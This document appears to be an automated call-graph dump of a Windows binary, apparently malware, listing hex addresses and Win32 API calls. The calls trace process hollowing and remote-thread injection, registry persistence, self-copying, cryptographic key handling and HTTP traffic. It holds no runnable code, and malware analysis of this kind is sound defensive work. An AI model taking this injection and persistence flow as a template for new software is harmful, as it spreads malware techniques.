16511->16514 16512->16417 16512->16424 16513 4009763 QueryPerformanceCounter 16513->16514 16514->16512 16514->16513 16516 4006c83 RegOpenKeyExA 16515->16516 16517 4006c7c 16515->16517 16518 40065ab 16516->16518 16519 4006ca7 16516->16519 16517->16516 16522 4001e60 16518->16522 16520 4009b90 QueryPerformanceCounter 16519->16520 16521 4006cae RegSetValueExA RegCloseKey 16520->16521 16521->16518 16523 4001ece 16522->16523 16524 4001e73 16522->16524 16523->16456 16523->16457 16525 4001e90 CreateProcessA 16524->16525 16525->16523 16526 4001ebe CloseHandle 16525->16526 16526->16523 16528 40074bc 16527->16528 16529 40074d2 Sleep 16528->16529 16530 40074f5 GetModuleFileNameA 16529->16530 16531 400750b 16529->16531 16532 4007583 SetFileAttributesA wnsprintfA 16530->16532 16533 4007520 GetAllUsersProfileDirectoryA 16531->16533 16534 4007536 GetEnvironmentVariableA 16531->16534 16536 40075d4 RegOpenKeyExA 16532->16536 16537 40075c6 TerminateThread 16532->16537 16535 400754d lstrcatA lstrcatA lstrcatA 16533->16535 16534->16535 16535->16532 16539 4007649 16536->16539 16540 400762a RegDeleteValueA RegCloseKey 16536->16540 16537->16536 16541 400765e GetEnvironmentVariableA GetTickCount GetTempFileNameA lstrcatA CreateFileA 16539->16541 16542 4005e30 6 API calls 16539->16542 16540->16539 16543 40065ce ExitProcess 16541->16543 16544 40076df lstrlenA WriteFile CloseHandle 16541->16544 16545 400765b 16542->16545 16546 4007731 16544->16546 16545->16541 16547 4007744 CreateProcessA 16546->16547 16548 40077a3 ExitProcess 16547->16548 16549 4007796 CloseHandle 16547->16549 16549->16548 16551 4006638 16550->16551 16552 4007264 16550->16552 16551->16430 16551->16431 16552->16551 16553 40072ad wsprintfA 16552->16553 16554 40072d8 16553->16554 16555 40072df RegOpenKeyExA 16553->16555 16554->16555 16555->16551 16556 4007307 RegQueryValueExA 16555->16556 16557 4007333 16556->16557 16558 40073a5 RegCloseKey 16556->16558 16557->16558 16559 4007339 GetLocalTime 16557->16559 16558->16551 16590 4009910 SystemTimeToFileTime SystemTimeToFileTime 16559->16590 16561 4007388 16561->16558 16562->16448 16592 40020b0 16563->16592 16567 4006891 16566->16567 16568 40073d0 16566->16568 16567->16453 16568->16567 16569 4007419 wsprintfA 16568->16569 16570 4007444 16569->16570 16571 400744b RegOpenKeyExA 16569->16571 16570->16571 16571->16567 16572 400746f GetLocalTime RegSetValueExA RegCloseKey 16571->16572 16572->16567 16573->16473 16575 4002573 16574->16575 16576 4002527 16574->16576 16575->16449 16576->16575 16577 4002531 VirtualAlloc 16576->16577 16577->16575 16578 400257a VirtualAllocEx 16577->16578 16579 400259f VirtualAllocEx 16578->16579 16581 40025d7 16578->16581 16580 40025bf VirtualFree 16579->16580 16579->16581 16580->16575 16582 4002653 WriteProcessMemory 16581->16582 16583 4002672 VirtualFree 16582->16583 16584 4002687 VirtualFree CreateRemoteThread 16582->16584 16583->16575 16584->16575 16586 400a3ed 16585->16586 16587 400a370 16585->16587 16586->16406 16587->16586 16588 400a39b RegOpenKeyExA 16587->16588 16588->16586 16589 400a3bf RegSetValueExA RegCloseKey 16588->16589 16589->16586 16591 400996b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16590->16591 16591->16561 16593 4002080 16592->16593 16594 40020c3 GetEnvironmentVariableA lstrcatA 16592->16594 16593->16454 16593->16474 16595 40020f2 lstrcatA lstrcatA 16594->16595 16596 4002115 16594->16596 16595->16596 16597 4002138 VirtualAlloc 16596->16597 16597->16593 16598 400219d CreateProcessA 16597->16598 16599 40021e2 VirtualAllocEx 16598->16599 16600 40021ca VirtualFree 16598->16600 16601 4002213 VirtualAllocEx 16599->16601 16603 400227d 16599->16603 16600->16593 16602 400223c TerminateProcess CloseHandle CloseHandle VirtualFree 16601->16602 16601->16603 16602->16593 16604 400237b WriteProcessMemory 16603->16604 16605 40023a0 TerminateProcess CloseHandle CloseHandle VirtualFree 16604->16605 16606 40023e1 VirtualFree GetThreadContext 16604->16606 16605->16593 16607 4002444 WriteProcessMemory 16606->16607 16608 4002414 TerminateProcess CloseHandle CloseHandle 16606->16608 16609 4002497 SetThreadContext 16607->16609 16610 400246a TerminateProcess CloseHandle CloseHandle 16607->16610 16608->16593 16611 40024c4 ResumeThread 16609->16611 16612 40024d9 TerminateProcess CloseHandle CloseHandle 16609->16612 16610->16593 16611->16593 16612->16593 16614 40077c0 CoInitialize 16613->16614 16615 40078c3 16613->16615 16616 40077e8 16614->16616 16617 40078bd CoUninitialize 16614->16617 16618 4007898 VirtualFree 16616->16618 16619 40077fc GetExitCodeProcess 16616->16619 16617->16615 16621 40097c0 2 API calls 16618->16621 16620 4007818 16619->16620 16625 400788f 16619->16625 16622 4007821 Sleep 16620->16622 16623 400782e CloseHandle Sleep 16620->16623 16624 40078ba 16621->16624 16622->16625 16626 4002070 32 API calls 16623->16626 16624->16617 16625->16618 16627 4007851 16626->16627 16627->16625 16628 4007863 16627->16628 16629 4002510 8 API calls 16627->16629 16628->16618 16630 400788c 16629->16630 16630->16625 16631 4004c47 VirtualAlloc VirtualAlloc VirtualAlloc 16632 40056eb 16631->16632 16633 4004c8a 16631->16633 16632->16632 16633->16632 16635 4004cc3 16633->16635 16637 40052a2 16633->16637 16641 4004db7 GetCurrentThreadId 16635->16641 16642 4004e2c 16635->16642 16659 4004ce5 16635->16659 16678 4008370 16637->16678 16638 4005354 lstrlenA lstrlenA 16639 40056b8 VirtualFree VirtualFree VirtualFree 16638->16639 16640 4005385 wsprintfA CryptBinaryToStringA 16638->16640 16639->16632 16640->16639 16643 40053d0 MultiByteToWideChar 16640->16643 16641->16659 16645 4004ee1 16642->16645 16646 4004e81 GetSystemMetrics GetSystemMetrics 16642->16646 16642->16659 16697 40017d0 16643->16697 16648 4004f40 16645->16648 16649 4004ef0 GlobalMemoryStatus 16645->16649 16646->16659 16654 4005032 16648->16654 16655 4004fdf lstrlenA 16648->16655 16648->16659 16649->16659 16650 400569b 16650->16639 16651 40056a4 VirtualFree 16650->16651 16651->16639 16652 400551b 16652->16650 16656 400552c EnterCriticalSection 16652->16656 16653 400547d VirtualFree 16662 40054b1 16653->16662 16657 4005041 lstrlenA 16654->16657 16658 4005096 16654->16658 16655->16659 16660 4005542 VirtualAlloc 16656->16660 16661 400558c VirtualAlloc 16656->16661 16657->16659 16663 4005104 16658->16663 16664 40050a5 lstrlenA 16658->16664 16665 4005578 16660->16665 16668 40055c7 GetTickCount 16661->16668 16669 400568e LeaveCriticalSection 16661->16669 16662->16652 16670 40017d0 16 API calls 16662->16670 16666 4005172 16663->16666 16667 4005113 lstrlenA 16663->16667 16664->16659 16665->16669 16671 40051e0 16666->16671 16672 4005181 lstrlenA 16666->16672 16667->16659 16674 40055da 16668->16674 16669->16650 16670->16662 16673 40051ef lstrlenA 16671->16673 16675 400523f 16671->16675 16672->16659 16673->16659 16677 400565c VirtualFree 16674->16677 16675->16659 16676 4009b90 QueryPerformanceCounter 16675->16676 16676->16659 16677->16669 16679 4005344 16678->16679 16680 4008387 16678->16680 16679->16638 16679->16639 16680->16679 16681 40083b1 VirtualAlloc VirtualAlloc 16680->16681 16682 4008592 16681->16682 16683 40083e9 16681->16683 16684 4008598 VirtualFree 16682->16684 16685 40085a9 16682->16685 16683->16682 16701 4008800 16683->16701 16684->16685 16685->16679 16687 40085af VirtualFree 16685->16687 16687->16679 16693 400847e 16723 4008970 16693->16723 16695 4008581 VirtualFree 16695->16682 16696 40084ad 16696->16695 16698 40017e1 16697->16698 16700 400181e 16697->16700 16698->16700 16734 4001840 16698->16734 16700->16650 16700->16652 16700->16653 16702 4008817 16701->16702 16703 4008420 16701->16703 16702->16703 16704 4008821 CryptAcquireContextA 16702->16704 16703->16682 16717 4008770 16703->16717 16705 4008845 GetLastError 16704->16705 16706 400887a 16704->16706 16707 4008860 CryptAcquireContextA 16705->16707 16708 4008857 16705->16708 16706->16703 16709 4008884 CryptGenKey 16706->16709 16707->16706 16708->16706 16708->16707 16710 4008950 CryptReleaseContext 16709->16710 16711 40088bd CryptExportKey 16709->16711 16710->16703 16712 4008946 CryptDestroyKey 16711->16712 16713 40088d9 16711->16713 16712->16710 16714 40088f1 CryptImportKey 16713->16714 16716 400893d 16713->16716 16715 4008916 CryptExportKey CryptDestroyKey 16714->16715 16714->16716 16715->16716 16716->16712 16718 40087d0 QueryPerformanceCounter 16717->16718 16719 400844b 16718->16719 16720 40087d0 16719->16720 16721 40087e3 QueryPerformanceCounter 16720->16721 16722 4008458 VirtualAlloc 16720->16722 16721->16722 16722->16682 16722->16693 16724 4008a60 16723->16724 16725 4008987 16723->16725 16724->16696 16725->16724 16726 40089a5 CryptAcquireContextA 16725->16726 16727 40089c9 GetLastError 16726->16727 16728 40089fe 16726->16728 16729 40089e4 CryptAcquireContextA 16727->16729 16730 40089db 16727->16730 16728->16724 16731 4008a04 CryptImportKey 16728->16731 16729->16728 16730->16728 16730->16729 16732 4008a54 CryptReleaseContext 16731->16732 16733 4008a29 CryptEncrypt CryptDestroyKey 16731->16733 16732->16724 16733->16732 16735 4001c95 16734->16735 16736 400185a 16734->16736 16735->16700 16736->16735 16737 40018ba InternetCrackUrlA 16736->16737 16737->16735 16738 4001910 InternetOpenA 16737->16738 16738->16735 16739 4001936 InternetConnectA 16738->16739 16740 4001c88 InternetCloseHandle 16739->16740 16741 400196f HttpOpenRequestA 16739->16741 16740->16735 16742 4001c7b InternetCloseHandle 16741->16742 16743 40019ad wnsprintfA HttpAddRequestHeadersA 16741->16743 16742->16740 16744 40019eb InternetSetOptionA 16743->16744 16745 4001c6e InternetCloseHandle 16743->16745 16754 4001a30 16744->16754 16745->16742 16747 4001a4d HttpSendRequestA 16748 4001a7b HttpQueryInfoA 16747->16748 16747->16754 16748->16754 16749 4001adc HttpQueryInfoA 16750 4001b47 VirtualAlloc 16749->16750 16749->16754 16751 4001c19 16750->16751 16750->16754 16752 4001c23 InternetReadFile 16751->16752 16752->16752 16752->16754 16753 4001b99 InternetReadFile 16753->16754 16754->16745 16754->16747 16754->16749 16754->16750 16754->16753 16755 411249 16756 411250 16755->16756 16767 4102f0 16756->16767 16758 411261 16759 4102f0 106 API calls 16758->16759 16760 411279 16759->16760 16761 4102f0 106 API calls 16760->16761 16762 411230 16761->16762 16790 413a00 16762->16790 16768 410472 16767->16768 16769 410322 16767->16769 16770 414330 12 API calls 16768->16770 16771 410327 16769->16771 16772 41032c 16769->16772 16773 41048e 16770->16773 16844 410280 16771->16844 16772->16773 16775 410339 TlsGetValue 16772->16775 16776 414330 12 API calls 16773->16776 16777 410357 16775->16777 16778 41034d 16775->16778 16779 4104b4 16776->16779 16818 40fb00 16777->16818 16778->16758 16783 414330 12 API calls 16779->16783 16781 41035c 16781->16778 16782 41036b 6 API calls 16781->16782 16785 4104e4 abort 16782->16785 16786 410426 GetThreadPriority 16782->16786 16784 4104da 16783->16784 16787 410455 TlsSetValue 16784->16787 16788 414330 12 API calls 16785->16788 16786->16779 16786->16787 16787->16778 16787->16785 16789 41050f 16788->16789 16789->16758 17310 413480 16790->17310 16792 413a77 GetCurrentThreadId 16793 411238 16792->16793 16794 413a13 16792->16794 16798 40f340 16793->16798 16794->16792 16794->16793 16795 413a39 ReleaseSemaphore 16794->16795 16797 413abe InterlockedDecrement 16794->16797 16795->16794 16796 413aa4 GetCurrentThreadId 16795->16796 16796->16794 16797->16794 16799 40f34b 16798->16799 16800 40f3ac 16798->16800 16801 40f358 16799->16801 16803 414330 12 API calls 16799->16803 16802 414700 2 API calls 16801->16802 16804 40f360 16802->16804 16803->16801 16805 414330 12 API calls 16804->16805 16806 40f36d 16804->16806 16805->16806 16807 40f395 16806->16807 16808 40f44a fprintf 16806->16808 16809 40f39b 16807->16809 17324 4140e0 16807->17324 16808->16809 16812 414330 12 API calls 16809->16812 16814 40f3a4 16809->16814 16811 414660 Sleep 16811->16800 16812->16814 16814->16811 16815 40f3c5 free 16815->16809 16817 414330 12 API calls 16817->16815 16819 40fb11 16818->16819 16820 40fbe3 16818->16820 16858 413fd0 16819->16858 16821 414330 12 API calls 16820->16821 16821->16819 16824 40fc10 16826 414330 12 API calls 16824->16826 16825 40fb26 16827 40fb84 calloc 16825->16827 16828 40fb2c 16825->16828 16829 40fc2c 16826->16829 16830 40fb9e 16827->16830 16843 40fb5a 16827->16843 16877 40f4d0 16828->16877 16829->16781 16833 40f4d0 15 API calls 16830->16833 16832 40fb6d 16835 413a00 19 API calls 16832->16835 16836 40fba3 16833->16836 16834 40fb33 16840 414330 12 API calls 16834->16840 16841 40fb4a 16834->16841 16834->16843 16838 40fb75 16835->16838 16839 40fbad free 16836->16839 16836->16843 16837 414330 12 API calls 16837->16832 16838->16781 16839->16843 16840->16841 16842 414330 12 API calls 16841->16842 16841->16843 16842->16843 16843->16832 16843->16837 17276 40f1c0 16844->17276 16847 413fd0 105 API calls 16848 41029a 16847->16848 16849 4102e0 16848->16849 16850 4102a0 16848->16850 17300 40fca0 16849->17300 16851 4102c5 16850->16851 16852 4102a5 fprintf 16850->16852 16854 413a00 19 API calls 16851->16854 16852->16851 16855 4102cd 16854->16855 16856 40f340 20 API calls 16855->16856 16857 4102d4 16856->16857 16857->16772 16859 413f10 16858->16859 16921 413d20 16859->16921 16861 413f22 16862 40fb19 16861->16862 16863 413f78 16861->16863 16865 413f38 16861->16865 16866 413fa0 GetCurrentThreadId 16861->16866 16862->16824 16862->16825 16864 413f80 GetCurrentThreadId 16863->16864 16863->16865 16869 413f90 16864->16869 16962 413770 16865->16962 16866->16865 16868 413fb4 16866->16868 16868->16869 16871 413fbf InterlockedIncrement 16868->16871 16870 413f45 16980 416290 16870->16980 16871->16869 16874 413d20 19 API calls 16875 413f67 16874->16875 16875->16864 16876 413f6b 16875->16876 16876->16862 16878 40f4e1 16877->16878 16879 40f81a 16877->16879 16880 40f4ee 16878->16880 16881 40f85f 16878->16881 16879->16834 16882 40f87b 16880->16882 16883 40f4fd 16880->16883 16884 414330 12 API calls 16881->16884 16885 414330 12 API calls 16882->16885 16887 40f824 malloc 16883->16887 16888 40f518 16883->16888 16905 40f553 16883->16905 16919 40f9d7 16883->16919 16884->16882 16885->16905 16886 414330 12 API calls 16889 40f9fd 16886->16889 16887->16879 16891 40f836 16887->16891 16890 40fa76 16888->16890 16894 40fa9c 16888->16894 16895 40f53b realloc 16888->16895 16901 414330 12 API calls 16889->16901 16892 414330 12 API calls 16890->16892 16896 40fac2 16891->16896 16903 414330 12 API calls 16891->16903 16891->16905 16892->16894 16893 414330 12 API calls 16893->16905 16898 414330 12 API calls 16894->16898 16895->16879 16895->16905 16900 414330 12 API calls 16896->16900 16897 40f7a7 16904 414330 12 API calls 16897->16904 16898->16896 16899 40f6eb 16899->16834 16900->16899 16902 40fa23 16901->16902 16907 414330 12 API calls 16902->16907 16903->16905 16906 40f7c3 16904->16906 16905->16889 16905->16893 16905->16897 16905->16899 16905->16902 16905->16906 16909 40ef80 12 API calls 16905->16909 16910 40f6c9 16905->16910 16911 40fa4e 16905->16911 16916 40f791 16905->16916 16917 40f9bb 16905->16917 16920 40f736 memmove 16905->16920 16908 414330 12 API calls 16906->16908 16907->16911 16908->16916 16909->16905 16910->16899 16912 414330 12 API calls 16910->16912 16913 414330 12 API calls 16911->16913 16912->16899 16913->16890 16914 414330 12 API calls 16915 40f79d 16914->16915 16915->16834 16916->16914 16916->16915 16918 414330 12 API calls 16917->16918 16918->16919 16919->16886 16920->16905 16922 413e20 16921->16922 16923 413d34 16921->16923 16924 414330 12 API calls 16922->16924 16925 414700 2 API calls 16923->16925 16926 413e3c 16924->16926 16927 413d3c 16925->16927 16930 414330 12 API calls 16926->16930 16928 413de0 16927->16928 16931 413d4e 16927->16931 16928->16926 16936 413de9 16928->16936 16929 414660 Sleep 16933 413df1 16929->16933 16930->16936 16932 413d56 16931->16932 16934 413ec0 16931->16934 16935 413d92 16931->16935 16941 413e70 16932->16941 16942 413d75 16932->16942 16933->16861 16938 414330 12 API calls 16934->16938 16937 414660 Sleep 16935->16937 16936->16929 16939 413d9a 16937->16939 16940 413edc 16938->16940 17006 413bd0 16939->17006 16951 414330 12 API calls 16940->16951 16945 414330 12 API calls 16941->16945 16943 414660 Sleep 16942->16943 16946 413d7d 16943->16946 16948 413e8c 16945->16948 16946->16861 16947 413da1 16949 413db1 16947->16949 16950 413e98 16947->16950 16948->16861 16953 414700 2 API calls 16949->16953 16952 414330 12 API calls 16950->16952 16954 413f02 16951->16954 16955 413eb4 16952->16955 16956 413db9 16953->16956 16955->16934 16957 413dc1 16956->16957 16958 413e00 16956->16958 16957->16940 16959 413dce 16957->16959 16958->16932 16960 414660 Sleep 16959->16960 16961 413dd6 16960->16961 16961->16861 16963 413783 16962->16963 16964 4137f4 16962->16964 16966 414700 2 API calls 16963->16966 16965 414330 12 API calls 16964->16965 16965->16963 16967 41378b 16966->16967 16968 41381c fprintf exit 16967->16968 16970 41379e 16967->16970 16969 414330 12 API calls 16968->16969 16971 41387f 16969->16971 16972 4137c1 16970->16972 16973 4137b1 16970->16973 16971->16870 16975 414330 12 API calls 16972->16975 16974 414660 Sleep 16973->16974 16976 4137b9 16974->16976 16977 4137dd 16975->16977 16976->16870 16978 414660 Sleep 16977->16978 16979 4137ec 16978->16979 16979->16870 16981 4162a9 16980->16981 16998 416345 16980->16998 17030 411dd0 16981->17030 16984 413f5c 16984->16862 16984->16874 16987 4163f0 16987->16998 17000 4163f9 16987->17000 16988 4162c4 WaitForMultipleObjects 16989 4162f0 16988->16989 16990 4163cd ResetEvent 16988->16990 16989->16984 16995 41630c WaitForSingleObject 16989->16995 16989->16998 16991 4163e6 16990->16991 16992 41650e 16990->16992 16991->16988 17042 412210 16991->17042 16992->16984 16994 412210 103 API calls 16992->16994 16994->16984 16995->16984 16996 416330 16995->16996 16996->16984 17036 412070 16996->17036 16997 416551 16997->16984 17001 412070 103 API calls 16997->17001 16998->16984 16998->16992 16998->16997 16999 412070 103 API calls 16998->16999 16999->16998 17000->16984 17003 412070 103 API calls 17000->17003 17005 41643b 17000->17005 17001->16992 17003->17000 17004 412210 103 API calls 17004->16984 17005->16984 17005->17004 17007 413ca0 17006->17007 17008 413be5 17006->17008 17009 414330 12 API calls 17007->17009 17010 414700 2 API calls 17008->17010 17009->17008 17011 413bef 17010->17011 17012 413c24 17011->17012 17015 413c10 17011->17015 17019 413c83 17011->17019 17020 413c07 17011->17020 17013 413c4f 17012->17013 17014 413c30 17012->17014 17018 414330 12 API calls 17013->17018 17017 414660 Sleep 17014->17017 17015->17012 17016 413af0 19 API calls 17015->17016 17016->17012 17021 413c38 17017->17021 17022 413c6c 17018->17022 17023 413c8c 17019->17023 17026 414330 12 API calls 17019->17026 17020->17015 17024 413cc8 17020->17024 17021->16947 17027 414660 Sleep 17022->17027 17025 413af0 19 API calls 17023->17025 17024->17023 17028 414330 12 API calls 17024->17028 17025->17012 17026->17023 17029 413c7b 17027->17029 17028->17023 17029->16947 17031 4102f0 106 API calls 17030->17031 17032 411dd8 17031->17032 17033 411df0 17032->17033 17081 4107c0 17033->17081 17035 411dff 17035->16987 17035->16988 17037 4120b0 17036->17037 17038 41207c 17036->17038 17039 414330 12 API calls 17037->17039 17040 412082 17038->17040 17041 4102f0 106 API calls 17038->17041 17039->17038 17040->16984 17041->17040 17043 4102f0 102 API calls 17042->17043 17045 41221d 17043->17045 17044 412238 17044->16991 17045->17044 17046 412232 17045->17046 17047 414330 12 API calls 17045->17047 17046->17044 17048 413fd0 102 API calls 17046->17048 17047->17046 17049 41224b 17048->17049 17050 412262 17049->17050 17052 412294 17049->17052 17051 413a00 19 API calls 17050->17051 17053 41226a 17051->17053 17054 4122b4 17052->17054 17055 4122aa ResetEvent 17052->17055 17053->16991 17056 413a00 19 API calls 17054->17056 17055->17054 17057 4122bc 17056->17057 17114 412120 17057->17114 17082 410800 17081->17082 17083 4107cc 17081->17083 17082->17035 17084 4107d5 17083->17084 17086 414330 12 API calls 17083->17086 17085 413fd0 106 API calls 17084->17085 17087 4107dd 17085->17087 17086->17084 17094 40ef80 17087->17094 17089 4107e4 17090 414330 12 API calls 17089->17090 17092 4107f0 17089->17092 17090->17092 17091 413a00 19 API calls 17093 4107f8 17091->17093 17092->17091 17093->17035 17095 40ef96 17094->17095 17096 40f0ae 17094->17096 17098 40f0ca 17095->17098 17099 40efa9 17095->17099 17110 40effb 17095->17110 17097 414330 12 API calls 17096->17097 17097->17098 17102 414330 12 API calls 17098->17102 17100 40f080 17099->17100 17101 40efb2 17099->17101 17104 40f08d 17100->17104 17105 414330 12 API calls 17100->17105 17103 40f0f0 17101->17103 17107 40efbf 17101->17107 17102->17103 17106 414330 12 API calls 17103->17106 17109 414330 12 API calls 17104->17109 17104->17110 17105->17104 17108 40f116 17106->17108 17107->17108 17107->17110 17113 414330 12 API calls 17107->17113 17111 40f126 17108->17111 17112 414330 12 API calls 17108->17112 17109->17110 17110->17089 17111->17089 17112->17111 17113->17107 17115 4102f0 105 API calls 17114->17115 17116 41212c 17115->17116 17123 4120e0 17116->17123 17118 412150 InterlockedDecrement 17121 412147 17118->17121 17119 414330 12 API calls 17119->17121 17120 4120e0 105 API calls 17120->17121 17121->17118 17121->17119 17121->17120 17129 411f10 17121->17129 17124 4102f0 104 API calls 17123->17124 17126 4120eb 17124->17126 17125 412105 17125->17121 17126->17125 17127 412107 InterlockedDecrement 17126->17127 17128 4120fc InterlockedIncrement 17126->17128 17127->17121 17128->17125 17130 4102f0 99 API calls 17129->17130 17135 411f20 17130->17135 17131 411f98 longjmp 17133 411fab CloseHandle 17131->17133 17133->17135 17134 411f42 TlsGetValue 17134->17135 17136 411f88 _endthreadex 17134->17136 17135->17131 17135->17133 17135->17134 17135->17136 17137 411fd7 TlsSetValue 17135->17137 17139 411ffb CloseHandle 17135->17139 17140 411f71 CloseHandle 17135->17140 17141 414330 12 API calls 17135->17141 17142 410860 17135->17142 17157 40fd20 17135->17157 17136->17135 17137->17136 17139->17135 17140->17135 17141->17135 17143 4107c0 106 API calls 17142->17143 17149 41086f 17143->17149 17144 410875 17144->17135 17145 414700 Sleep Sleep 17145->17149 17146 410a26 17147 414660 Sleep 17146->17147 17148 410a32 17147->17148 17148->17148 17149->17144 17149->17145 17149->17146 17151 414330 12 API calls 17149->17151 17152 414660 Sleep 17149->17152 17154 410a00 17149->17154 17194 415520 17149->17194 17209 4157e0 17149->17209 17151->17149 17152->17149 17155 414330 12 API calls 17154->17155 17156 410a1c 17155->17156 17156->17135 17158 40ff66 17157->17158 17159 40fd36 17157->17159 17160 414330 12 API calls 17158->17160 17161 413fd0 102 API calls 17159->17161 17162 40ff82 17160->17162 17163 40fd3e 17161->17163 17168 414330 12 API calls 17162->17168 17165 40ffb6 17163->17165 17166 40fdfe 17163->17166 17172 40fd4c 17163->17172 17164 40fd53 free 17164->17172 17169 414330 12 API calls 17165->17169 17170 40ffd6 17166->17170 17166->17172 17177 40fe15 17166->17177 17167 40fd62 free 17167->17172 17171 40ffac 17168->17171 17169->17170 17173 414330 12 API calls 17170->17173 17171->17135 17172->17164 17172->17167 17174 40feee 17172->17174 17178 40ff32 17172->17178 17180 40fdbf 17172->17180 17184 41023b 17172->17184 17185 4100b9 memmove 17172->17185 17190 4100f8 free 17172->17190 17193 414330 12 API calls 17172->17193 17173->17172 17175 414330 12 API calls 17174->17175 17175->17178 17176 414330 12 API calls 17176->17177 17177->17172 17177->17176 17179 414330 12 API calls 17178->17179 17181 40ff5c 17179->17181 17180->17162 17182 40fdcc 17180->17182 17181->17135 17182->17174 17183 40fde1 17182->17183 17186 413a00 19 API calls 17183->17186 17188 414330 12 API calls 17184->17188 17185->17172 17187 40fde9 17186->17187 17187->17135 17189 410263 17188->17189 17190->17172 17191 41021f 17190->17191 17192 414330 12 API calls 17191->17192 17192->17184 17193->17172 17195 412210 105 API calls 17194->17195 17196 415531 17195->17196 17225 415320 17196->17225 17199 41553c 17199->17149 17200 413fd0 105 API calls 17201 415551 17200->17201 17202 415555 InterlockedIncrement 17201->17202 17203 415575 17201->17203 17202->17203 17204 41556d 17202->17204 17206 413fd0 105 API calls 17203->17206 17208 413a00 19 API calls 17203->17208 17239 414ed0 17203->17239 17205 413a00 19 API calls 17204->17205 17205->17203 17206->17203 17208->17203 17244 414cc0 17209->17244 17211 4157f3 17212 415818 17211->17212 17213 415830 17211->17213 17214 415800 InterlockedDecrement 17211->17214 17212->17149 17216 413fd0 104 API calls 17213->17216 17215 414ed0 19 API calls 17214->17215 17215->17212 17217 41583b 17216->17217 17217->17212 17218 415841 InterlockedIncrement 17217->17218 17219 415863 17218->17219 17220 415857 17218->17220 17258 416830 17219->17258 17221 413a00 19 API calls 17220->17221 17221->17212 17224 413a00 19 API calls 17224->17212 17226 415370 17225->17226 17227 41532b 17225->17227 17228 415240 34 API calls 17226->17228 17229 415334 17227->17229 17231 414330 12 API calls 17227->17231 17232 415363 17227->17232 17228->17227 17230 414700 Sleep Sleep 17229->17230 17233 41533c 17230->17233 17231->17229 17232->17199 17232->17200 17234 415380 17233->17234 17235 415359 17233->17235 17237 414330 12 API calls 17234->17237 17236 414660 Sleep 17235->17236 17238 415361 17236->17238 17237->17235 17238->17232 17240 413a00 19 API calls 17239->17240 17241 414ee8 17240->17241 17242 413a00 19 API calls 17241->17242 17243 414ef2 17242->17243 17243->17203 17245 414d53 17244->17245 17246 414cd5 17244->17246 17247 414330 12 API calls 17245->17247 17248 414700 Sleep Sleep 17246->17248 17247->17246 17249 414ce2 17248->17249 17250 414d20 17249->17250 17251 414cfe 17249->17251 17253 414330 12 API calls 17250->17253 17252 414660 Sleep 17251->17252 17254 414d06 17252->17254 17255 414d3c 17253->17255 17254->17211 17256 414660 Sleep 17255->17256 17257 414d4b 17256->17257 17257->17211 17259 416844 17258->17259 17269 41586e 17258->17269 17260 416864 EnterCriticalSection 17259->17260 17259->17269 17261 4168c0 17260->17261 17262 41687a 17260->17262 17263 416910 LeaveCriticalSection 17261->17263 17265 4168c8 17261->17265 17262->17263 17264 416885 LeaveCriticalSection 17262->17264 17266 412210 102 API calls 17263->17266 17270 415cc0 7 API calls 17264->17270 17268 416590 102 API calls 17265->17268 17266->17269 17271 4168e7 17268->17271 17269->17224 17272 4168b3 17270->17272 17271->17264 17273 416928 LeaveCriticalSection 17271->17273 17275 412210 102 API calls 17272->17275 17274 412210 102 API calls 17273->17274 17274->17269 17275->17269 17277 40f1d5 17276->17277 17278 40f2b9 17276->17278 17280 414700 2 API calls 17277->17280 17279 414330 12 API calls 17278->17279 17281 40f2d5 17279->17281 17282 40f1dd 17280->17282 17284 40f2df calloc 17281->17284 17283 40f1ea 17282->17283 17286 414330 12 API calls 17282->17286 17283->17284 17285 40f1f4 17283->17285 17287 40f307 17284->17287 17288 40f30e 17284->17288 17289 40f20d calloc 17285->17289 17294 40f1f8 17285->17294 17286->17283 17290 40f22f 17287->17290 17291 414330 12 API calls 17288->17291 17289->17290 17292 413af0 19 API calls 17290->17292 17293 40f32a 17291->17293 17292->17294 17295 40f24b 17294->17295 17296 40f270 17294->17296 17297 414660 Sleep 17295->17297 17298 414330 12 API calls 17296->17298 17299 40f258 17297->17299 17298->17295 17299->16847 17301 40fcd0 17300->17301 17302 40fcae TlsAlloc 17300->17302 17303 414330 12 API calls 17301->17303 17304 40fcf5 17302->17304 17309 40fcbf 17302->17309 17306 40fcec 17303->17306 17305 414330 12 API calls 17304->17305 17305->17309 17306->17302 17307 40fcc4 17307->16851 17308 40fd18 abort 17309->17307 17309->17308 17311 413523 17310->17311 17312 413497 17310->17312 17313 414330 12 API calls 17311->17313 17314 414700 2 API calls 17312->17314 17313->17312 17315 41349f 17314->17315 17316 4134f0 17315->17316 17317 4134bc 17315->17317 17318 414330 12 API calls 17316->17318 17319 414660 Sleep 17317->17319 17320 41350c 17318->17320 17321 4134c4 17319->17321 17322 414660 Sleep 17320->17322 17321->16794 17323 41351b 17322->17323 17323->16794 17329 4135e0 17324->17329 17326 4140f3 17327 40f3bd 17326->17327 17328 414100 CloseHandle free 17326->17328 17327->16815 17327->16817 17328->17327 17330 413667 17329->17330 17331 4135fa 17329->17331 17332 414330 12 API calls 17330->17332 17340 4145d0 17331->17340 17332->17331 17335 41360b 17335->17326 17336 41363c 17338 414660 Sleep 17336->17338 17337 414330 12 API calls 17337->17336 17339 413644 17338->17339 17339->17326 17341 4145e5 17340->17341 17343 413602 17340->17343 17342 414601 Sleep 17341->17342 17341->17343 17342->17342 17342->17343 17343->17335 17343->17336 17343->17337 17344 401179 17345 40119e 17344->17345 17346 401490 GetStartupInfoA 17345->17346 17347 4011ee 17345->17347 17350 4014a1 _initterm 17346->17350 17348 401219 InterlockedCompareExchange 17347->17348 17349 401235 17347->17349 17351 40120d Sleep 17347->17351 17348->17347 17348->17349 17352 401433 _amsg_exit 17349->17352 17353 401245 17349->17353 17354 4014c4 17350->17354 17351->17348 17356 40126a 17352->17356 17357 40144d _initterm 17352->17357 17353->17350 17355 401252 17353->17355 17360 4014cb exit 17354->17360 17355->17356 17355->17357 17358 401272 17356->17358 17359 401473 InterlockedExchange 17356->17359 17357->17358 17357->17359 17376 40d0c0 17358->17376 17359->17358 17362 40129c SetUnhandledExceptionFilter 17387 40ee40 InterlockedExchange 17362->17387 17364 401338 malloc 17364->17354 17365 401365 17364->17365 17366 401370 strlen malloc memcpy 17365->17366 17366->17366 17367 4013a7 17366->17367 17388 40d430 17367->17388 17368 4012bd 17368->17364 17370 4013c2 17393 419090 17370->17393 17373 401401 17374 401415 17373->17374 17375 40140b _cexit 17373->17375 17375->17374 17377 40d0c9 17376->17377 17378 40d0d0 17376->17378 17377->17362 17379 40d1aa 17378->17379 17380 40d1c9 17378->17380 17384 40d15b 